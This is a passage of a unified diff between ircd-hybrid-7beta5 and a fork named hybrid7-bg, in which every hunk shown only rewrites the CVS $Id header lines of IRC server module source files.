- *   $Id: m_accept.c,v 1.21 2001/04/04 15:22:22 androsyn Exp $
+ *   $Id: m_accept.c,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_admin.c hybrid7-bg/modules/m_admin.c
--- ircd-hybrid-7beta5/modules/m_admin.c	Mon May 14 06:08:55 2001
+++ hybrid7-bg/modules/m_admin.c	Tue Jun  5 12:35:44 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_admin.c,v 1.25 2001/05/14 10:08:55 toot Exp $
+ *   $Id: m_admin.c,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_away.c hybrid7-bg/modules/m_away.c
--- ircd-hybrid-7beta5/modules/m_away.c	Tue Apr 24 05:47:55 2001
+++ hybrid7-bg/modules/m_away.c	Tue Jun  5 12:35:44 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_away.c,v 1.21 2001/04/24 09:47:55 habeeb Exp $
+ *   $Id: m_away.c,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_capab.c hybrid7-bg/modules/m_capab.c
--- ircd-hybrid-7beta5/modules/m_capab.c	Wed Apr  4 11:22:22 2001
+++ hybrid7-bg/modules/m_capab.c	Tue Jun  5 12:35:44 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_capab.c,v 1.17 2001/04/04 15:22:22 androsyn Exp $
+ *   $Id: m_capab.c,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_cburst.c hybrid7-bg/modules/m_cburst.c
--- ircd-hybrid-7beta5/modules/m_cburst.c	Wed Apr  4 11:22:23 2001
+++ hybrid7-bg/modules/m_cburst.c	Tue Jun  5 12:35:44 2001
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: m_cburst.c,v 1.31 2001/04/04 15:22:23 androsyn Exp $
+ * $Id: m_cburst.c,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #include "tools.h"
 #include "channel.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_challenge.c hybrid7-bg/modules/m_challenge.c
--- ircd-hybrid-7beta5/modules/m_challenge.c	Fri Apr 13 18:39:45 2001
+++ hybrid7-bg/modules/m_challenge.c	Tue Jun  5 12:35:44 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_challenge.c,v 1.21 2001/04/13 22:39:45 davidt Exp $
+ *   $Id: m_challenge.c,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #include <stdlib.h>
 #include <string.h>
diff -uNrd ircd-hybrid-7beta5/modules/m_cjoin.c hybrid7-bg/modules/m_cjoin.c
--- ircd-hybrid-7beta5/modules/m_cjoin.c	Mon May 14 06:08:55 2001
+++ hybrid7-bg/modules/m_cjoin.c	Tue Jun  5 12:35:44 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_cjoin.c,v 1.31 2001/05/14 10:08:55 toot Exp $
+ *   $Id: m_cjoin.c,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #include "tools.h"
 #include "handlers.h"
